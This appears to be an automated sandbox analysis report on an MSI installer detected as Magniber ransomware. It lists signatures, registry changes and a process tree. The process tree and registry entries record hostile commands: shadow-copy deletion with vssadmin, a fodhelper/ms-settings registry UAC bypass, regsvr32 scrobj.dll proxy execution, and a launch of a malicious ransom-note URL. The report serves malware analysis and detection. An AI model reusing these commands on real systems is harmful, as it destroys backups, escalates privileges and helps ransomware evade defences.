Analysis
max time kernel: 147s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-08-2024 03:41
Static task: static1
Behavioral task: behavioral1
  Sample: 41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: 41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
  Resource: win10v2004-20240802-en
General
Target: 41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
Size: 96KB
MD5: 42ad49ed99c0d41a820316309bc2c3b3
SHA1: f447a72b3cbea72e1b56fda8f44fd9f304b4474a
SHA256: 41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
SHA512: 4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
SSDEEP: 1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun
Malware Config
Signatures

Detect magniber ransomware (1 IoC)
  resource: behavioral2/memory/2952-11-0x000001BF99BE0000-0x000001BF99BE3000-memory.dmp
  yara_rule: family_magniber

Magniber Ransomware
  Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

Deletes shadow copies (3 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Renames multiple (105) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.

System Binary Proxy Execution: Regsvr32 (1 TTP, 9 IoCs)
  Abuse Regsvr32 to proxy execution of malicious code.
  Processes (pid, process): 4592 regsvr32.exe; 1280 regsvr32.exe; 4636 regsvr32.exe; 3780 regsvr32.exe; 2364 regsvr32.exe; 5084 regsvr32.exe; 2780 regsvr32.exe; 3492 regsvr32.exe; 3556 regsvr32.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes (description, ioc, process): all 46 entries are "File opened (read-only)" by msiexec.exe, with the ioc in this order: \??\H:, \??\L:, \??\H:, \??\I:, \??\G:, \??\S:, \??\T:, \??\V:, \??\N:, \??\U:, \??\V:, \??\W:, \??\X:, \??\X:, \??\Y:, \??\E:, \??\R:, \??\W:, \??\E:, \??\L:, \??\P:, \??\M:, \??\O:, \??\N:, \??\U:, \??\J:, \??\O:, \??\Q:, \??\R:, \??\K:, \??\I:, \??\P:, \??\B:, \??\K:, \??\M:, \??\Y:, \??\Z:, \??\B:, \??\J:, \??\Q:, \??\A:, \??\G:, \??\S:, \??\T:, \??\A:, \??\Z:
Suspicious use of SetThreadContext (3 IoCs)
  Processes (description | pid process | procid_target):
    PID 4232 set thread context of 2952 | 4232 MsiExec.exe | 51
    PID 4232 set thread context of 3020 | 4232 MsiExec.exe | 52
    PID 4232 set thread context of 3160 | 4232 MsiExec.exe | 53

Drops file in Windows directory (9 IoCs)
  Processes (description ioc | process):
    File opened for modification C:\Windows\Installer\e58076d.msi | msiexec.exe
    File opened for modification C:\Windows\Installer\ | msiexec.exe
    File opened for modification C:\Windows\Installer\MSI7FA.tmp | msiexec.exe
    File created C:\Windows\Installer\e58076d.msi | msiexec.exe
    File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
    File created C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
    File created C:\Windows\Installer\SourceHash{806B562E-D37E-4F22-8C47-582974C985AC} | msiexec.exe
    File opened for modification C:\Windows\Installer\MSIC12.tmp | msiexec.exe
    File created C:\Windows\Installer\e58076f.msi | msiexec.exe

Loads dropped DLL (1 IoC)
  Processes (pid, process): 4232 MsiExec.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Installer Packages (2 TTPs, 1 IoC)

Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (description ioc | process):
vssvc.exedescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description ioc | process):
    Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Interacts with shadow copies (3 TTPs, 6 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (pid, process): 3824 vssadmin.exe; 4116 vssadmin.exe; 4028 vssadmin.exe; 4792 vssadmin.exe; 2896 vssadmin.exe; 64 vssadmin.exe

Modifies registry class (13 IoCs)
  Processes (description ioc | process):
    Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open | regsvr32.exe
    Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" | regsvr32.exe
    Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
    Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
    Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
    Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | sihost.exe
    Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings | regsvr32.exe
    Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell | regsvr32.exe
    Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" | regsvr32.exe
    Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
    Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
    Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
    Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" | regsvr32.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes (pid, process): 4848 msiexec.exe (x2); 4232 MsiExec.exe (x2); 1168 msedge.exe (x2); 2160 msedge.exe (x2); 2868 identity_helper.exe (x2); 4500 msedge.exe (x4)

Suspicious behavior: MapViewOfSection (3 IoCs)
  Processes (pid, process): 4232 MsiExec.exe (x3)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (10 IoCs)
  Processes (pid, process): 2160 msedge.exe (x10)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (pid process: tokens, in the order recorded):
    2868 msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege
    4848 msiexec.exe: SeSecurityPrivilege
    2868 msiexec.exe: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
    2060 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
    4848 msiexec.exe: SeBackupPrivilege, SeRestorePrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege

Suspicious use of FindShellTrayWindow (27 IoCs)
  Processes (pid, process): 2868 msiexec.exe (x2); 2160 msedge.exe (x25)

Suspicious use of SendNotifyMessage (24 IoCs)
  Processes (pid, process): 2160 msedge.exe (x24)

Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description | pid process | procid_target), with repeat counts:
    PID 4848 wrote to memory of 2368 | 4848 msiexec.exe | 93 (x2)
    PID 4848 wrote to memory of 4232 | 4848 msiexec.exe | 95 (x2)
    PID 2952 wrote to memory of 2364 | 2952 sihost.exe | 96 (x2)
    PID 3160 wrote to memory of 3780 | 3160 taskhostw.exe | 97 (x2)
    PID 3020 wrote to memory of 4592 | 3020 svchost.exe | 98 (x2)
    PID 4232 wrote to memory of 1420 | 4232 MsiExec.exe | 99 (x2)
    PID 1420 wrote to memory of 2160 | 1420 cmd.exe | 101 (x2)
    PID 2160 wrote to memory of 1988 | 2160 msedge.exe | 102 (x2)
    PID 2160 wrote to memory of 1300 | 2160 msedge.exe | 103 (x40)
    PID 2160 wrote to memory of 1168 | 2160 msedge.exe | 104 (x2)
    PID 2160 wrote to memory of 2000 | 2160 msedge.exe | 105 (x6)

Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (process tree; the number in brackets is the depth in the tree)

[1] C:\Windows\system32\sihost.exe
    cmd: sihost.exe
    sig: Modifies registry class; Suspicious use of WriteProcessMemory
    PID: 2952
  [2] C:\Windows\system32\regsvr32.exe
      cmd: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      sig: System Binary Proxy Execution: Regsvr32; Modifies registry class
      PID: 2364
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c "start fodhelper.exe"
      PID: 3824
    [3] C:\Windows\system32\fodhelper.exe
        cmd: fodhelper.exe
        PID: 2004
      [4] C:\Windows\system32\regsvr32.exe
          cmd: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
          sig: System Binary Proxy Execution: Regsvr32
          PID: 1280
        [5] C:\Windows\System32\vssadmin.exe
            cmd: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            sig: Interacts with shadow copies
            PID: 3824
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c "start fodhelper.exe"
      PID: 1184
    [3] C:\Windows\system32\fodhelper.exe
        cmd: fodhelper.exe
        PID: 3228
      [4] C:\Windows\system32\regsvr32.exe
          cmd: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
          sig: System Binary Proxy Execution: Regsvr32
          PID: 3492
        [5] C:\Windows\System32\vssadmin.exe
            cmd: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            sig: Interacts with shadow copies
            PID: 2896

[1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    sig: Suspicious use of WriteProcessMemory
    PID: 3020
  [2] C:\Windows\system32\regsvr32.exe
      cmd: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      sig: System Binary Proxy Execution: Regsvr32; Modifies registry class
      PID: 4592
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c "start fodhelper.exe"
      PID: 1036
    [3] C:\Windows\system32\fodhelper.exe
        cmd: fodhelper.exe
        PID: 4764
      [4] C:\Windows\system32\regsvr32.exe
          cmd: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
          sig: System Binary Proxy Execution: Regsvr32
          PID: 5084
        [5] C:\Windows\System32\vssadmin.exe
            cmd: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            sig: Interacts with shadow copies
            PID: 4028
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c "start fodhelper.exe"
      PID: 372
    [3] C:\Windows\system32\fodhelper.exe
        cmd: fodhelper.exe
        PID: 4340
      [4] C:\Windows\system32\regsvr32.exe
          cmd: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
          sig: System Binary Proxy Execution: Regsvr32
          PID: 3556
        [5] C:\Windows\System32\vssadmin.exe
            cmd: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            sig: Interacts with shadow copies
            PID: 64

[1] C:\Windows\system32\taskhostw.exe
    cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    sig: Suspicious use of WriteProcessMemory
    PID: 3160
  [2] C:\Windows\system32\regsvr32.exe
      cmd: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      sig: System Binary Proxy Execution: Regsvr32; Modifies registry class
      PID: 3780
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c "start fodhelper.exe"
      PID: 2960
    [3] C:\Windows\system32\fodhelper.exe
        cmd: fodhelper.exe
        PID: 3500
      [4] C:\Windows\system32\regsvr32.exe
          cmd: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
          sig: System Binary Proxy Execution: Regsvr32
          PID: 4636
        [5] C:\Windows\System32\vssadmin.exe
            cmd: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            sig: Interacts with shadow copies
            PID: 4116
  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c "start fodhelper.exe"
      PID: 64
    [3] C:\Windows\system32\fodhelper.exe
        cmd: fodhelper.exe
        PID: 4764
      [4] C:\Windows\system32\regsvr32.exe
          cmd: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
          sig: System Binary Proxy Execution: Regsvr32
          PID: 2780
        [5] C:\Windows\System32\vssadmin.exe
            cmd: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            sig: Interacts with shadow copies
            PID: 4792

[1] C:\Windows\system32\msiexec.exe
    cmd: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
    sig: Enumerates connected drives; Event Triggered Execution: Installer Packages; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
    PID: 2868

[1] C:\Windows\system32\msiexec.exe
    cmd: C:\Windows\system32\msiexec.exe /V
    sig: Enumerates connected drives; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    PID: 4848
  [2] C:\Windows\system32\srtasks.exe
      cmd: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      PID: 2368
  [2] C:\Windows\System32\MsiExec.exe
      cmd: C:\Windows\System32\MsiExec.exe -Embedding 24A418637D146F136416107A9C10BA30
      sig: Suspicious use of SetThreadContext; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
      PID: 4232
    [3] C:\Windows\System32\cmd.exe
        cmd: cmd /c "start microsoft-edge:http://e4849888bca4c080686ctbodbmuw.ofrisk.info/tbodbmuw^&2^&45737672^&105^&477^&2219041
        sig: Suspicious use of WriteProcessMemory
        PID: 1420
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://e4849888bca4c080686ctbodbmuw.ofrisk.info/tbodbmuw&2&45737672&105&477&2219041
          sig: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
          PID: 2160
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xbc,0x128,0x7ffe5f8046f8,0x7ffe5f804708,0x7ffe5f804718
            PID: 1988
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (gpu-process, PID 1300; full command line as captured on the next line)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:25⤵PID:1300
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
            sig: Suspicious behavior: EnumeratesProcesses
            PID: 1168
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
            PID: 2000
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
            PID: 1804
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
            PID: 4816
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
            PID: 5088
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
            PID: 372
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
            PID: 3048
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
            sig: Suspicious behavior: EnumeratesProcesses
            PID: 2868
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
            PID: 4904
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
            PID: 2820
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
            PID: 3248
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
            PID: 4852
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:1
            PID: 4992
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:1
            PID: 4840
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (gpu-process, PID 4500; full command line as captured on the next line)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:25⤵
            sig: Suspicious behavior: EnumeratesProcesses
            PID: 4500

[1] C:\Windows\system32\vssvc.exe
    cmd: C:\Windows\system32\vssvc.exe
    sig: Checks SCSI registry key(s); Suspicious use of AdjustPrivilegeToken
    PID: 2060

[1] C:\Windows\System32\CompPkgSrv.exe
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 3028

[1] C:\Windows\System32\CompPkgSrv.exe
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 4988
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- Direct Volume Access (1)
- Indicator Removal (2)
  - File Deletion (2)
- System Binary Proxy Execution (2)
  - Msiexec (1)
  - Regsvr32 (1)
Downloads